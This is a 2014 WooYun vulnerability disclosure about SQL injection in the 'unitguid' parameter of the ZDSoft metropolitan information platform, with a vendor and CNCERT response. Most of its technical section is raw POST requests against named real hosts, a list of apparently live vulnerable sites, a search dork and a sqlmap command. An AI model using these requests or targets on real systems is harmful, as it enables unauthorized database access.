当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064113

漏洞标题:某综合信息平台通用SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: sex is not show

提交时间:2014-06-10 10:23

修复时间:2014-09-08 10:24

公开时间:2014-09-08 10:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-10: 细节已通知厂商并且等待厂商处理中
2014-06-14: 厂商已经确认,细节仅向厂商公开
2014-06-17: 细节向第三方安全合作伙伴开放
2014-08-08: 细节向核心白帽子及相关领域专家公开
2014-08-18: 细节向普通白帽子公开
2014-08-28: 细节向实习白帽子公开
2014-09-08: 细节向公众公开

简要描述:

现在找个漏洞不容易了..

详细说明:

web程序名称:ZDSoft城域综合信息平台
相关厂商:浙大万朋(应该是他)
关键词:google/baidu: intitle:ZDSoft城域综合信息平台
用户量:

1.jpg


漏洞文件:cnet/student2/generalquery/archives/archivesfrm.jsp
漏洞字段:unitguid
漏洞成因:文件未做权限判断,字段未过滤,导致注入产生
在下面实例演示中,我都列出了数据包,因为在测试过程中,发现直接改host参数后,sqlmap识别不了注入,郁闷。 所以就自己手动的抓包测试了,漏洞是真实存在的
自己整理了几个网站列表:

http://120.35.4.22:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
http://222.132.51.26:1949/cnet/student2/generalquery/archives/archivesfrm.jsp
http://220.166.21.94:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
http://vod.ydxedu.com:81/cnet/student2/generalquery/archives/archivesfrm.jsp
http://www.gyzqjy.com:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
http://118.122.51.66:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
http://gm.fsjy.cn:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
http://221.0.93.135/cnet/student2/generalquery/archives/archivesfrm.jsp
http://oa.fsjyj.gov.cn:81/cnet/student2/generalquery/archives/archivesfrm.jsp
http://211.86.89.229:9999/cnet/student2/generalquery/archives/archivesfrm.jsp
http://61.153.240.147:8080/cnet/student2/generalquery/archives/archivesfrm.jsp


下面真实案例演示:
1.
http://120.35.4.22:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
post数据包:

POST /cnet/student2/generalquery/archives/archivesfrm.jsp HTTP/1.1
Host: 120.35.4.22:8080
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ACD5A7CF820CEE8794775C22B3890E07
Content-Length: 49
idTree=&infoid=&modid=&modname=&unitguid=Eh4kygaB


丢sqlmap里跑:
sqlmap -r 1.txt -p unitguid

1.jpg


1.jpg


2.
http://222.132.51.26:1949/cnet/student2/generalquery/archives/archivesfrm.jsp
post数据包:

POST /cnet/student2/generalquery/archives/archivesfrm.jsp HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://222.132.51.26:1949/
Cookie: JSESSIONID=C356F9EEAEB6140FA64728A791EA031C; guid=2c6de924-08f0-4412-a30d-bc0e0cc42b3b; saveUserName=1; userName=1
Host: 222.132.51.26:1949
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
idTree=&infoid=&modid=&modname=&unitguid=Eh4kygaB


1.jpg


1.jpg


3.
http://220.166.21.94:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
post数据包:

POST /cnet/student2/generalquery/archives/archivesfrm.jsp HTTP/1.1
Host: 220.166.21.94:8080
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=198FF1A21178AD03FE7AF73202FBBDFF; JSESSIONID=AF68E0896DA8B438D40D22684CE3B392
Content-Length: 49
idTree=&infoid=&modid=&modname=&unitguid=Eh4kygaB


1.jpg


1.jpg


4.
http://vod.ydxedu.com:81/cnet/student2/generalquery/archives/archivesfrm.jsp
post数据包:

POST /cnet/student2/generalquery/archives/archivesfrm.jsp HTTP/1.1
Host: vod.ydxedu.com:81
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
idTree=&infoid=&modid=&modname=&unitguid=Eh4kygaB


1.jpg


1.jpg


5.
http://www.gyzqjy.com:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
post数据包:

POST /cnet/student2/generalquery/archives/archivesfrm.jsp HTTP/1.1
Host: www.gyzqjy.com:8080
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ret43ixmwzp1bcpd50kfh5mt
idTree=&infoid=&modid=&modname=&unitguid=Eh4kygaB


1.jpg


1.jpg

漏洞证明:

见详细吧

修复方案:

参数过滤,文件加访问权限

版权声明:转载请注明来源 sex is not show@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-06-14 22:40

厂商回复:

CNVD确认并复现所述多个实例情况,已经由CNVD向软件生产厂商浙大万朋公司通报,电话: 8717 8314(郑工)将通报发送 处置。同时根据测试实例,转同CNCERT同步下发案例给福建、四川、山东、浙江分中心处置。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-06-10 10:25 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    百忙之中来mk

  2. 2014-06-10 10:34 | sex is not show 认证白帽子 ( 普通白帽子 | Rank:1495 漏洞数:233 | 这家伙真懒!)

    @Mr.leo 都是小厂商、 郁闷

  3. 2014-06-10 11:53 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @sex is not show 政务类的可能就是大厂商了